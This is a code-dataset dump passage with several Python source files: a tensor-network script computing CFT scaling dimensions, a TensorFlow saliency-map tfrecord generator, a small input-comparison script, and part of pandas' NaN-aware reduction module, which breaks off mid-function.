ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | b40333e31e4894552565a247bd47adb1028ff94e | #!/usr/bin/python3
import numpy as np
import os
import sys
import modeldata
import tensordispenser
import initialtensors
import operator
import itertools
import warnings
import scaldim_plot
import toolbox
from tensors.tensor import Tensor
from tensorstorer import write_tensor_file, read_tensor_file
from scon_sparseeig import scon_sparseeig
from timer import Timer
from pathfinder import PathFinder
from custom_parser import parse_argv
from scon import scon
np.set_printoptions(precision=7)
np.set_printoptions(linewidth=100)
def get_id_pars(pars):
id_pars = dict()
mandatory_id_pars = {"model", "symmetry_tensors", "dtype",
"initial2x2", "initial4x4",
"n_normalization", "n_discard",
"block_width", "defect_angles", "KW",
"do_momenta", "do_eigenvectors", "n_dims_do"}
modelname = pars["model"].lower().strip()
if modelname == "ising":
mandatory_id_pars |= {"J", "H", "beta"}
elif modelname == "potts3":
mandatory_id_pars |= {"J", "beta"}
if pars["symmetry_tensors"]:
mandatory_id_pars |= {"qnums_do"}
if not pars["symmetry_tensors"]:
mandatory_id_pars |= {"sep_qnums"}
for k in mandatory_id_pars:
if k in pars:
id_pars[k] = pars[k]
else:
raise RuntimeError("The required parameter %s was not given."%k)
return id_pars
def parse():
pars = parse_argv(sys.argv,
# Format is: (name_of_argument, type, default)
("model", "str", ""),
("dtype", "dtype", np.complex_),
("J", "float", 1),
("H", "float", 0),
("initial2x2", "bool", False),
("initial4x4", "bool", False),
("n_dims_do", "int", 17),
("qnums_do", "int_list", []), #[] denotes all
("n_normalization", "int", 3),
("n_discard", "int", 0),
("block_width", "int", 8),
("defect_angles", "float_list", [0]),
("KW", "bool", False),
("do_eigenvectors", "bool", False),
("do_momenta", "bool", False),
("symmetry_tensors", "bool", False),
("sep_qnums", "bool", False),
# IO parameters.
("n_dims_plot", "int", 17),
("max_dim_plot", "float", 20000),
("qnums_plot", "int_list", []), #[] denotes all
("xtick_rotation", "int", 0),
("show_plots", "bool", True),
("save_plots", "bool", False),
("draw_exact_lines", "bool", True),
("draw_exact_circles", "bool", True),
("draw_defect_angle", "bool", True),
("plot_by_qnum", "bool", True),
("plot_by_momenta", "bool", False),
("plot_by_alpha", "bool", False),
("save_scaldim_file", "bool", True))
pars = vars(pars)
# - Format parameters -
pars["beta"] = modeldata.get_critical_beta(pars)
pars["J"] = pars["dtype"](pars["J"])
pars["H"] = pars["dtype"](pars["H"])
pars["defect_angles"] = sorted(pars["defect_angles"], key=abs)
if (not pars["symmetry_tensors"] and pars["sep_qnums"]
and not pars["do_eigenvectors"]):
raise ValueError("sep_qnums requires do_eigenvectors.")
if pars["defect_angles"] != [0] and pars["KW"]:
raise ValueError("Non-trivial defect_angles and KW.")
if pars["n_dims_plot"] > pars["n_dims_do"]:
raise ValueError("n_dims_plot > n_dims_do")
if not set(pars["qnums_plot"]).issubset(set(pars["qnums_do"])):
raise ValueError("qnums_plot is not included in qnums_do")
return pars
def get_defect(alpha, T, index):
# Build a group-like defect.
dim = T.shape[index]
try:
qim = T.qhape[index]
except TypeError:
qim = None
defect = type(T).eye(dim, qim=qim, dtype=T.dtype)
if alpha != 0:
for k,v in defect.sects.items():
phase = np.exp(1j*alpha*k[0])
defect[k] = v*phase
return defect
def get_T(pars):
# We always get the invariant tensor here, and cast it to the
# non-invariant one later if we so wish.
# This makes constructing the defects easier.
T = tensordispenser.get_tensor(pars, iter_count=0,
symmetry_tensors=True)[0]
log_fact = 0
Fs = []
Ns = []
cum = T
for i in range(1, pars["n_normalization"]):
cum = toolbox.contract2x2(cum)
log_fact *= 4
m = cum.abs().max()
if m != 0:
cum /= m
log_fact += np.log(m)
N = 4**i
F = np.log(scon(cum, [1,2,1,2]).value()) + log_fact
Fs.append(F)
Ns.append(N)
A, B = np.polyfit(Ns[pars["n_discard"]:], Fs[pars["n_discard"]:], 1)
T /= np.exp(A)
return T
def get_T_first(T, pars, alpha=0):
if pars["KW"]:
T_first = initialtensors.get_KW_tensor(pars)
elif pars["do_momenta"]:
defect_horz = get_defect(alpha, T, 0)
defect_vert = get_defect(alpha, T, 1).conjugate().transpose()
T_first = scon((T, defect_horz, defect_vert),
([1,-2,-3,4], [-1,1], [4,-4]))
else:
defect_horz = get_defect(alpha, T, 0)
T_first = scon((T, defect_horz), ([1,-2,-3,-4], [-1,1]))
return T_first
def qnums_from_eigenvectors(evects, pars):
sites = len(evects.shape) - 1
if pars["model"].strip().lower() == "ising":
symop = np.array([[1,0], [0,-1]], dtype=np.float_)
symop = type(evects).from_ndarray(symop)
else:
# TODO generalize symop to models other than Ising.
NotImplementedError("Symmetry operators for models other than "
"Ising have not been implemented.")
ncon_list = (evects, evects.conjugate()) + (symop,)*sites
index_list = ((list(range(1,sites+1)) + [-1],
list(range(sites+1, 2*sites+1)) + [-2])
+ tuple([i+sites,i] for i in range(1,sites+1)))
qnums = scon(ncon_list, index_list)
qnums = qnums.diag()
# Round to the closest possible qnum for the given model.
pos_qnums = initialtensors.symmetry_classes_dims_qims[pars["model"]][2]
max_qnum = max(pos_qnums)
qnums = qnums.astype(np.complex_).log()*(max_qnum+1)/(2j*np.pi)
qnums = [min(pos_qnums, key=lambda x: abs(x-q)) for q in qnums]
return qnums
def separate_vector_by_qnum(v, qnums, pars):
# Get the right tensor type and the possible qnums for this model.
symdata = initialtensors.symmetry_classes_dims_qims[pars["model"]]
T, pos_qnums = symdata[0], symdata[2]
vals = {}
for q in pos_qnums:
vals[q] = []
for s, q in zip(v, qnums):
vals[q].append(s)
dim = [len(vals[q]) for q in pos_qnums]
tensor = T.empty(shape=(dim,), qhape=(pos_qnums,), dirs=[1], invar=False)
for q in pos_qnums:
block = np.array(vals[q])
tensor[(q,)] = block
print(tensor)
return tensor
def get_cft_data(pars):
T = get_T(pars)
scaldims_by_alpha = {}
if pars["do_momenta"]:
momenta_by_alpha = {}
if pars["do_eigenvectors"]:
evects_by_alpha = {}
for alpha in pars["defect_angles"]:
print("Building the matrix to diagonalize.")
T_first = get_T_first(T, pars, alpha=alpha)
# Get the eigenvalues and their logarithms.
block_width = pars["block_width"]
n_dims_do = pars["n_dims_do"]
if pars["do_momenta"]:
translation = list(range(1, block_width)) + [0]
else:
translation = range(block_width)
scon_list = [T_first] + [T]*(block_width-1)
index_list = [[block_width*2, -101, 2, -1]]
for i in range(2, block_width+1):
index_list += [[2*i-2, -100-i, 2*i, -(2*i-1)]]
if pars["KW"] and pars["do_momenta"]:
U = initialtensors.get_KW_unitary(pars)
scon_list += [U]
for l in index_list:
l[0] += 2
l[2] += 2
l[3] += -2
index_list[0][3] *= -1
index_list[1][3] *= -1
U_indices = [3,5,-1,-2]
index_list.append(U_indices)
if not pars["symmetry_tensors"]:
# Cast to non-invariant tensors.
scon_list = [Tensor.from_ndarray(T.to_ndarray())
for T in scon_list]
hermitian = not pars["do_momenta"]
res = scon_sparseeig(scon_list, index_list, translation,
range(block_width), hermitian=hermitian,
return_eigenvectors=pars["do_eigenvectors"],
qnums_do=pars["qnums_do"],
maxiter=500, tol=1e-8, k=pars["n_dims_do"])
if pars["do_eigenvectors"]:
es, evects = res
else:
es = res
# Convert es to complex for taking the log.
es = es.astype(np.complex_, copy=False)
# Log and scale the eigenvalues.
block_width = pars["block_width"]
if pars["KW"]:
block_width -= 0.5
log_es = es.log() * block_width / (2*np.pi)
# Extract the central charge.
if alpha == 0:
if pars["KW"]:
c = (log_es.real().max() + 0.0625) * 12
else:
c = log_es.real().max() * 12
try:
log_es -= c/12
except NameError:
raise ValueError("Need to provide 0 in defect_angles to be able "
"to obtain the central charge.")
log_es *= -1
scaldims = log_es.real()
if (not pars["symmetry_tensors"]) and pars["sep_qnums"]:
qnums = qnums_from_eigenvectors(evects, pars)
scaldims = separate_vector_by_qnum(scaldims, qnums, pars)
scaldims_by_alpha[alpha] = scaldims
if pars["do_momenta"]:
momenta = log_es.imag()
if (not pars["symmetry_tensors"]) and pars["sep_qnums"]:
momenta = separate_vector_by_qnum(momenta, qnums, pars)
momenta_by_alpha[alpha] = momenta
if pars["do_eigenvectors"]:
evects_by_alpha[alpha] = evects
ret_val = (scaldims_by_alpha, c)
if pars["do_momenta"]:
ret_val += (momenta_by_alpha,)
if pars["do_eigenvectors"]:
ret_val += (evects_by_alpha,)
return ret_val
def load_cft_data(pars, **kwargs):
if kwargs:
pars = pars.copy()
pars.update(kwargs)
id_pars = get_id_pars(pars)
filename = os.path.basename(__file__)
try:
res = read_tensor_file("scals_by_alpha", pars=id_pars,
filename=filename)
except RuntimeError:
print("Constructing scaling dimensions.")
timer = Timer()
timer.start()
res = get_cft_data(pars)
print("Done constructing scaling dimensions.\n")
timer.print_elapsed()
if pars["save_scaldim_file"]:
write_tensor_file(data=res, prefix="scals_by_alpha",
pars=id_pars, filename=filename)
return res
#=============================================================================#
if __name__ == "__main__":
pars = parse()
id_pars = get_id_pars(pars)
filename = os.path.basename(__file__)
pather = PathFinder(filename, id_pars)
# - Infoprint -
print("\n" + ("="*70) + "\n")
print("Running %s with the following parameters:"%filename)
for k,v in sorted(pars.items()):
print("%s = %s"%(k, v))
res = load_cft_data(pars)
scaldims_by_alpha, c = res[:2]
if pars["do_momenta"]:
momenta_by_alpha = res[2]
else:
momenta_by_alpha = None
scaldim_plot.plot_and_print_dict(scaldims_by_alpha, c, pars, pather,
momenta_dict=momenta_by_alpha,
id_pars=id_pars)
|
py | b40334041f68239ea2cadbee89d384237af7d64b | from . import vsum_tool
from .DatasetBuilder import DatasetBuilder
from .BaseVideo import BaseVideo
from .SumMeVideo import SumMeVideo
from .TVSumVideo import TVSumVideo
from .VSUMMVideo import VSUMMVideo
|
py | b403345efc441e2c6eafb806833a9b7bca128ea4 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
r"""This script allows generation of tfrecords.
"""
import os
from absl import app
from absl import flags
import numpy as np
from scipy import ndimage
from six.moves import range
import tensorflow.compat.v1 as tf
from interpretability_benchmark.saliency_data_gen.data_helper import DataIterator
from interpretability_benchmark.saliency_data_gen.data_helper import image_to_tfexample
from interpretability_benchmark.saliency_data_gen.data_helper import SALIENCY_BASELINE
from interpretability_benchmark.saliency_data_gen.saliency_helper import generate_saliency_image
from interpretability_benchmark.saliency_data_gen.saliency_helper import get_saliency_image
from interpretability_benchmark.utils import resnet_model
tf.disable_v2_behavior()
flags.DEFINE_string('master', '', 'Name of the TensorFlow master to use.')
flags.DEFINE_string('output_dir', '/tmp/saliency/',
'output directory for tfrecords')
flags.DEFINE_string('data_path', '', 'Pathway to the input tfrecord dataset.')
flags.DEFINE_string('ckpt_path', '', 'Pathway to the trained checkpoint.')
flags.DEFINE_enum(
'split', 'validation', ('training', 'validation'),
'Specifies whether to create saliency maps for'
'training or test set.')
flags.DEFINE_enum('dataset_name', 'imagenet',
('food_101', 'imagenet', 'birdsnap'),
'What dataset is the model trained on.')
flags.DEFINE_enum('saliency_method', 'SH_SG',
('SH_SG', 'IG_SG', 'GB_SG', 'SH_SG_2', 'IG_SG_2', 'GB_SG_2',
'GB', 'IG', 'SH', 'SOBEL'),
'saliency method dataset to produce.')
flags.DEFINE_bool('test_small_sample', True,
'Boolean for whether to test internally.')
FLAGS = flags.FLAGS
MEAN_RGB = [0.485 * 255, 0.456 * 255, 0.406 * 255]
STDDEV_RGB = [0.229 * 255, 0.224 * 255, 0.225 * 255]
N_CLASSES = {'imagenet': 1000, 'food_101': 101, 'birdsnap': 500}
class ProcessSaliencyMaps(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self, dataset_name, saliency_method, ckpt_directory,
num_label_classes):
# Create a single Session to run all image coding calls.
self._dataset_name = dataset_name
self._saliency_method = saliency_method
self._ckpt_directory = ckpt_directory
self._num_label_classes = num_label_classes
def produce_saliency_map(self, data_path, writer):
"""produces a saliency map."""
self._dataset = DataIterator(
data_path,
self._dataset_name,
preprocessing=False,
test_small_sample=FLAGS.test_small_sample)
self._graph = tf.Graph()
with self._graph.as_default():
image_raw, image_processed, label = self._dataset.input_fn()
image_processed -= tf.constant(
MEAN_RGB, shape=[1, 1, 3], dtype=image_processed.dtype)
image_processed /= tf.constant(
STDDEV_RGB, shape=[1, 1, 3], dtype=image_processed.dtype)
network = resnet_model.resnet_50(
num_classes=self._num_label_classes,
data_format='channels_last',
)
logits = network(inputs=image_processed, is_training=False)
prediction = tf.cast(tf.argmax(logits, axis=1), tf.int32)
self._neuron_selector = tf.placeholder(tf.int32)
y = logits[0][self._neuron_selector]
self._sess = tf.Session(graph=self._graph)
saver = tf.train.Saver()
saver.restore(self._sess, self._ckpt_directory)
self._gradient_placeholder = get_saliency_image(
self._graph, self._sess, y, image_processed, 'gradient')
self._back_prop_placeholder = get_saliency_image(
self._graph, self._sess, y, image_processed, 'guided_backprop')
self._integrated_gradient_placeholder = get_saliency_image(
self._graph, self._sess, y, image_processed, 'integrated_gradients')
baseline = SALIENCY_BASELINE['resnet_50']
self._coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=self._sess, coord=self._coord)
example_count = 0
try:
while True:
img_out, raw_img_out, label_out, prediction_out = self._sess.run(
[image_processed, image_raw, label, prediction])
if img_out.shape[3] == 3:
img_out = np.squeeze(img_out)
feed_dict = {self._neuron_selector: prediction_out[0]}
if self._saliency_method != 'SOBEL':
saliency_map = generate_saliency_image(
self._saliency_method, img_out, feed_dict,
self._gradient_placeholder, self._back_prop_placeholder,
self._integrated_gradient_placeholder, baseline)
else:
saliency_map = ndimage.sobel(img_out, axis=0)
saliency_map = saliency_map.astype(np.float32)
saliency_map = np.reshape(saliency_map, [-1])
example = image_to_tfexample(
raw_image=raw_img_out[0], maps=saliency_map, label=label_out)
writer.write(example.SerializeToString())
example_count += 1
if FLAGS.test_small_sample:
if example_count == 2:
break
except tf.errors.OutOfRangeError:
print('Finished number of images:', example_count)
finally:
self._coord.request_stop()
self._coord.join(threads)
writer.close()
def generate_dataset(data_directory, dataset_name, num_shards, output_directory,
ckpt_directory, num_label_classes, filenames,
saliency_method):
"""Generate a dataset."""
data_gen = ProcessSaliencyMaps(
dataset_name=dataset_name,
ckpt_directory=ckpt_directory,
num_label_classes=num_label_classes,
saliency_method=saliency_method)
counter = 0
for i in range(num_shards):
filename = filenames[i]
data_path = data_directory + filename
output_file = os.path.join(output_directory, filename)
writer = tf.python_io.TFRecordWriter(output_file)
_ = data_gen.produce_saliency_map(data_path, writer)
counter += 1
print('Finished shard number:', counter)
print('Finished outputting all records to the directory.')
def main(argv):
del argv # Unused.
if FLAGS.test_small_sample:
filenames = ['test_small_sample']
num_shards = 1
output_dir = FLAGS.output_dir
else:
output_dir = ('%s/%s/%s/%s' % (FLAGS.output_dir, FLAGS.dataset_name,
'resnet_50', FLAGS.saliency_method))
filenames = tf.gfile.ListDirectory(FLAGS.data_path)
num_shards = len(filenames)
generate_dataset(
data_directory=FLAGS.data_path,
output_directory=output_dir,
num_shards=num_shards,
dataset_name=FLAGS.dataset_name,
ckpt_directory=FLAGS.ckpt_directory,
num_label_classes=N_CLASSES[FLAGS.dataset_name],
filenames=filenames,
saliency_method=FLAGS.saliency_method)
if __name__ == '__main__':
app.run(main)
|
py | b40334657f18c2e51ad6b521045e0b5db6b96b4e | # -*- coding: utf-8 -*-
while (True):
X, Y = map(int, input().split())
if (X == Y):
break
print("Crescente" if (X < Y) else "Decrescente") |
py | b40334c1857ac02aa08a3de887773e6f8b6a8aa7 | from pandas import compat
import sys
import itertools
import functools
import numpy as np
from pandas.core.common import isnull, notnull, _values_from_object, is_float
import pandas.core.common as com
import pandas.lib as lib
import pandas.algos as algos
import pandas.hashtable as _hash
import pandas.tslib as tslib
from pandas.compat import builtins
try:
import bottleneck as bn
_USE_BOTTLENECK = True
except ImportError: # pragma: no cover
_USE_BOTTLENECK = False
class disallow(object):
def __init__(self, *dtypes):
super(disallow, self).__init__()
self.dtypes = tuple(np.dtype(dtype).type for dtype in dtypes)
def check(self, obj):
return hasattr(obj, 'dtype') and issubclass(obj.dtype.type,
self.dtypes)
def __call__(self, f):
@functools.wraps(f)
def _f(*args, **kwargs):
obj_iter = itertools.chain(args, compat.itervalues(kwargs))
if any(self.check(obj) for obj in obj_iter):
raise TypeError('reduction operation {0!r} not allowed for '
'this dtype'.format(f.__name__.replace('nan',
'')))
return f(*args, **kwargs)
return _f
class bottleneck_switch(object):
def __init__(self, zero_value=None, **kwargs):
self.zero_value = zero_value
self.kwargs = kwargs
def __call__(self, alt):
bn_name = alt.__name__
try:
bn_func = getattr(bn, bn_name)
except (AttributeError, NameError): # pragma: no cover
bn_func = None
@functools.wraps(alt)
def f(values, axis=None, skipna=True, **kwds):
if len(self.kwargs) > 0:
for k, v in compat.iteritems(self.kwargs):
if k not in kwds:
kwds[k] = v
try:
if self.zero_value is not None and values.size == 0:
if values.ndim == 1:
return 0
else:
result_shape = (values.shape[:axis] +
values.shape[axis + 1:])
result = np.empty(result_shape)
result.fill(0)
return result
if _USE_BOTTLENECK and skipna and _bn_ok_dtype(values.dtype, bn_name):
result = bn_func(values, axis=axis, **kwds)
# prefer to treat inf/-inf as NA, but must compute the func
# twice :(
if _has_infs(result):
result = alt(values, axis=axis, skipna=skipna, **kwds)
else:
result = alt(values, axis=axis, skipna=skipna, **kwds)
except Exception:
result = alt(values, axis=axis, skipna=skipna, **kwds)
return result
return f
def _bn_ok_dtype(dt, name):
# Bottleneck chokes on datetime64
if dt != np.object_ and not issubclass(dt.type, (np.datetime64, np.timedelta64)):
# bottleneck does not properly upcast during the sum
# so can overflow
if name == 'nansum':
if dt.itemsize < 8:
return False
return True
return False
def _has_infs(result):
if isinstance(result, np.ndarray):
if result.dtype == 'f8':
return lib.has_infs_f8(result)
elif result.dtype == 'f4':
return lib.has_infs_f4(result)
return False
return np.isinf(result) or np.isneginf(result)
def _get_fill_value(dtype, fill_value=None, fill_value_typ=None):
""" return the correct fill value for the dtype of the values """
if fill_value is not None:
return fill_value
if _na_ok_dtype(dtype):
if fill_value_typ is None:
return np.nan
else:
if fill_value_typ == '+inf':
return np.inf
else:
return -np.inf
else:
if fill_value_typ is None:
return tslib.iNaT
else:
if fill_value_typ == '+inf':
# need the max int here
return np.iinfo(np.int64).max
else:
return tslib.iNaT
def _get_values(values, skipna, fill_value=None, fill_value_typ=None,
isfinite=False, copy=True):
""" utility to get the values view, mask, dtype
if necessary copy and mask using the specified fill_value
copy = True will force the copy """
values = _values_from_object(values)
if isfinite:
mask = _isfinite(values)
else:
mask = isnull(values)
dtype = values.dtype
dtype_ok = _na_ok_dtype(dtype)
# get our fill value (in case we need to provide an alternative
# dtype for it)
fill_value = _get_fill_value(dtype, fill_value=fill_value,
fill_value_typ=fill_value_typ)
if skipna:
if copy:
values = values.copy()
if dtype_ok:
np.putmask(values, mask, fill_value)
# promote if needed
else:
values, changed = com._maybe_upcast_putmask(values, mask,
fill_value)
elif copy:
values = values.copy()
values = _view_if_needed(values)
# return a platform independent precision dtype
dtype_max = dtype
if dtype.kind == 'i' and not issubclass(
dtype.type, (np.bool, np.datetime64, np.timedelta64)):
dtype_max = np.int64
elif dtype.kind in ['b'] or issubclass(dtype.type, np.bool):
dtype_max = np.int64
elif dtype.kind in ['f']:
dtype_max = np.float64
return values, mask, dtype, dtype_max
def _isfinite(values):
if issubclass(values.dtype.type, (np.timedelta64, np.datetime64)):
return isnull(values)
elif isinstance(values.dtype, object):
return ~np.isfinite(values.astype('float64'))
return ~np.isfinite(values)
def _na_ok_dtype(dtype):
return not issubclass(dtype.type, (np.integer, np.datetime64,
np.timedelta64))
def _view_if_needed(values):
if issubclass(values.dtype.type, (np.datetime64, np.timedelta64)):
return values.view(np.int64)
return values
def _wrap_results(result, dtype):
""" wrap our results if needed """
if issubclass(dtype.type, np.datetime64):
if not isinstance(result, np.ndarray):
result = lib.Timestamp(result)
else:
result = result.view(dtype)
elif issubclass(dtype.type, np.timedelta64):
if not isinstance(result, np.ndarray):
# this is a scalar timedelta result!
# we have series convert then take the element (scalar)
# as series will do the right thing in py3 (and deal with numpy
# 1.6.2 bug in that it results dtype of timedelta64[us]
from pandas import Series
# coerce float to results
if is_float(result):
result = int(result)
result = Series([result], dtype='timedelta64[ns]')
else:
result = result.view(dtype)
return result
def nanany(values, axis=None, skipna=True):
values, mask, dtype, _ = _get_values(values, skipna, False, copy=skipna)
return values.any(axis)
def nanall(values, axis=None, skipna=True):
values, mask, dtype, _ = _get_values(values, skipna, True, copy=skipna)
return values.all(axis)
@disallow('M8')
@bottleneck_switch(zero_value=0)
def nansum(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna, 0)
the_sum = values.sum(axis,dtype=dtype_max)
the_sum = _maybe_null_out(the_sum, axis, mask)
return _wrap_results(the_sum, dtype)
@disallow('M8')
@bottleneck_switch()
def nanmean(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna, 0)
the_sum = _ensure_numeric(values.sum(axis, dtype=dtype_max))
count = _get_counts(mask, axis)
if axis is not None:
the_mean = the_sum / count
ct_mask = count == 0
if ct_mask.any():
the_mean[ct_mask] = np.nan
else:
the_mean = the_sum / count if count > 0 else np.nan
return _wrap_results(the_mean, dtype)
@disallow('M8')
@bottleneck_switch()
def nanmedian(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna)
def get_median(x):
mask = notnull(x)
if not skipna and not mask.all():
return np.nan
return algos.median(_values_from_object(x[mask]))
if values.dtype != np.float64:
values = values.astype('f8')
notempty = values.size
# an array from a frame
if values.ndim > 1:
# there's a non-empty array to apply over otherwise numpy raises
if notempty:
return np.apply_along_axis(get_median, axis, values)
# must return the correct shape, but median is not defined for the
# empty set so return nans of shape "everything but the passed axis"
# since "axis" is where the reduction would occur if we had a nonempty
# array
shp = np.array(values.shape)
dims = np.arange(values.ndim)
ret = np.empty(shp[dims != axis])
ret.fill(np.nan)
return ret
# otherwise return a scalar value
return _wrap_results(get_median(values), dtype) if notempty else np.nan
def _get_counts_nanvar(mask, axis, ddof):
count = _get_counts(mask, axis)
d = count-ddof
# always return NaN, never inf
if np.isscalar(count):
if count <= ddof:
count = np.nan
d = np.nan
else:
mask2 = count <= ddof
if mask2.any():
np.putmask(d, mask2, np.nan)
np.putmask(count, mask2, np.nan)
return count, d
@disallow('M8')
@bottleneck_switch(ddof=1)
def nanvar(values, axis=None, skipna=True, ddof=1):
if not isinstance(values.dtype.type, np.floating):
values = values.astype('f8')
mask = isnull(values)
count, d = _get_counts_nanvar(mask, axis, ddof)
if skipna:
values = values.copy()
np.putmask(values, mask, 0)
X = _ensure_numeric(values.sum(axis))
XX = _ensure_numeric((values ** 2).sum(axis))
return np.fabs((XX - X ** 2 / count) / d)
def nansem(values, axis=None, skipna=True, ddof=1):
var = nanvar(values, axis, skipna, ddof=ddof)
if not isinstance(values.dtype.type, np.floating):
values = values.astype('f8')
mask = isnull(values)
count, _ = _get_counts_nanvar(mask, axis, ddof)
return np.sqrt(var)/np.sqrt(count)
@bottleneck_switch()
def nanmin(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna, fill_value_typ='+inf')
# numpy 1.6.1 workaround in Python 3.x
if (values.dtype == np.object_ and compat.PY3):
if values.ndim > 1:
apply_ax = axis if axis is not None else 0
result = np.apply_along_axis(builtins.min, apply_ax, values)
else:
try:
result = builtins.min(values)
except:
result = np.nan
else:
if ((axis is not None and values.shape[axis] == 0)
or values.size == 0):
try:
result = com.ensure_float(values.sum(axis,dtype=dtype_max))
result.fill(np.nan)
except:
result = np.nan
else:
result = values.min(axis)
result = _wrap_results(result, dtype)
return _maybe_null_out(result, axis, mask)
@bottleneck_switch()
def nanmax(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna, fill_value_typ='-inf')
# numpy 1.6.1 workaround in Python 3.x
if (values.dtype == np.object_ and compat.PY3):
if values.ndim > 1:
apply_ax = axis if axis is not None else 0
result = np.apply_along_axis(builtins.max, apply_ax, values)
else:
try:
result = builtins.max(values)
except:
result = np.nan
else:
if ((axis is not None and values.shape[axis] == 0)
or values.size == 0):
try:
result = com.ensure_float(values.sum(axis, dtype=dtype_max))
result.fill(np.nan)
except:
result = np.nan
else:
result = values.max(axis)
result = _wrap_results(result, dtype)
return _maybe_null_out(result, axis, mask)
def nanargmax(values, axis=None, skipna=True):
"""
Returns -1 in the NA case
"""
values, mask, dtype, _ = _get_values(values, skipna, fill_value_typ='-inf',
isfinite=True)
result = values.argmax(axis)
result = _maybe_arg_null_out(result, axis, mask, skipna)
return result
def nanargmin(values, axis=None, skipna=True):
"""
Returns -1 in the NA case
"""
values, mask, dtype, _ = _get_values(values, skipna, fill_value_typ='+inf',
isfinite=True)
result = values.argmin(axis)
result = _maybe_arg_null_out(result, axis, mask, skipna)
return result
@disallow('M8')
def nanskew(values, axis=None, skipna=True):
if not isinstance(values.dtype.type, np.floating):
values = values.astype('f8')
mask = isnull(values)
count = _get_counts(mask, axis)
if skipna:
values = values.copy()
np.putmask(values, mask, 0)
A = values.sum(axis) / count
B = (values ** 2).sum(axis) / count - A ** 2
C = (values ** 3).sum(axis) / count - A ** 3 - 3 * A * B
# floating point error
B = _zero_out_fperr(B)
C = _zero_out_fperr(C)
result = ((np.sqrt((count ** 2 - count)) * C) /
((count - 2) * np.sqrt(B) ** 3))
if isinstance(result, np.ndarray):
result = np.where(B == 0, 0, result)
result[count < 3] = np.nan
return result
else:
result = 0 if B == 0 else result
if count < 3:
return np.nan
return result
@disallow('M8')
def nankurt(values, axis=None, skipna=True):
if not isinstance(values.dtype.type, np.floating):
values = values.astype('f8')
mask = isnull(values)
count = _get_counts(mask, axis)
if skipna:
values = values.copy()
np.putmask(values, mask, 0)
A = values.sum(axis) / count
B = (values ** 2).sum(axis) / count - A ** 2
C = (values ** 3).sum(axis) / count - A ** 3 - 3 * A * B
D = (values ** 4).sum(axis) / count - A ** 4 - 6 * B * A * A - 4 * C * A
B = _zero_out_fperr(B)
C = _zero_out_fperr(C)
D = _zero_out_fperr(D)
result = (((count * count - 1.) * D / (B * B) - 3 * ((count - 1.) ** 2)) /
((count - 2.) * (count - 3.)))
if isinstance(result, np.ndarray):
result = np.where(B == 0, 0, result)
result[count < 4] = np.nan
return result
else:
result = 0 if B == 0 else result
if count < 4:
return np.nan
return result
@disallow('M8')
def nanprod(values, axis=None, skipna=True):
mask = isnull(values)
if skipna and not issubclass(values.dtype.type, np.integer):
values = values.copy()
values[mask] = 1
result = values.prod(axis)
return _maybe_null_out(result, axis, mask)
def _maybe_arg_null_out(result, axis, mask, skipna):
# helper function for nanargmin/nanargmax
if axis is None:
if skipna:
if mask.all():
result = -1
else:
if mask.any():
result = -1
else:
if skipna:
na_mask = mask.all(axis)
else:
na_mask = mask.any(axis)
if na_mask.any():
result[na_mask] = -1
return result
def _get_counts(mask, axis):
if axis is not None:
count = (mask.shape[axis] - mask.sum(axis)).astype(float)
else:
count = float(mask.size - mask.sum())
return count
def _maybe_null_out(result, axis, mask):
if axis is not None:
null_mask = (mask.shape[axis] - mask.sum(axis)) == 0
if null_mask.any():
result = result.astype('f8')
result[null_mask] = np.nan
else:
null_mask = mask.size - mask.sum()
if null_mask == 0:
result = np.nan
return result
def _zero_out_fperr(arg):
if isinstance(arg, np.ndarray):
return np.where(np.abs(arg) < 1e-14, 0, arg)
else:
return 0 if np.abs(arg) < 1e-14 else arg
@disallow('M8')
def nancorr(a, b, method='pearson', min_periods=None):
"""
a, b: ndarrays
"""
if len(a) != len(b):
raise AssertionError('Operands to nancorr must have same size')
if min_periods is None:
min_periods = 1
valid = notnull(a) & notnull(b)
if not valid.all():
a = a[valid]
b = b[valid]
if len(a) < min_periods:
return np.nan
f = get_corr_func(method)
return f(a, b)
def get_corr_func(method):
if method in ['kendall', 'spearman']:
from scipy.stats import kendalltau, spearmanr
def _pearson(a, b):
return np.corrcoef(a, b)[0, 1]
def _kendall(a, b):
rs = kendalltau(a, b)
if isinstance(rs, tuple):
return rs[0]
return rs
def _spearman(a, b):
return spearmanr(a, b)[0]
_cor_methods = {
'pearson': _pearson,
'kendall': _kendall,
'spearman': _spearman
}
return _cor_methods[method]
@disallow('M8')
def nancov(a, b, min_periods=None):
if len(a) != len(b):
raise AssertionError('Operands to nancov must have same size')
if min_periods is None:
min_periods = 1
valid = notnull(a) & notnull(b)
if not valid.all():
a = a[valid]
b = b[valid]
if len(a) < min_periods:
return np.nan
return np.cov(a, b)[0, 1]
def _ensure_numeric(x):
if isinstance(x, np.ndarray):
if x.dtype == np.object_:
x = x.astype(np.float64)
elif not (com.is_float(x) or com.is_integer(x) or com.is_complex(x)):
try:
x = float(x)
except Exception:
try:
x = complex(x)
except Exception:
raise TypeError('Could not convert %s to numeric' % str(x))
return x
# NA-friendly array comparisons
import operator
def make_nancomp(op):
def f(x, y):
xmask = isnull(x)
ymask = isnull(y)
mask = xmask | ymask
result = op(x, y)
if mask.any():
if result.dtype == np.bool_:
result = result.astype('O')
np.putmask(result, mask, np.nan)
return result
return f
nangt = make_nancomp(operator.gt)
nange = make_nancomp(operator.ge)
nanlt = make_nancomp(operator.lt)
nanle = make_nancomp(operator.le)
naneq = make_nancomp(operator.eq)
nanne = make_nancomp(operator.ne)
def unique1d(values):
"""
Hash table-based unique
"""
if np.issubdtype(values.dtype, np.floating):
table = _hash.Float64HashTable(len(values))
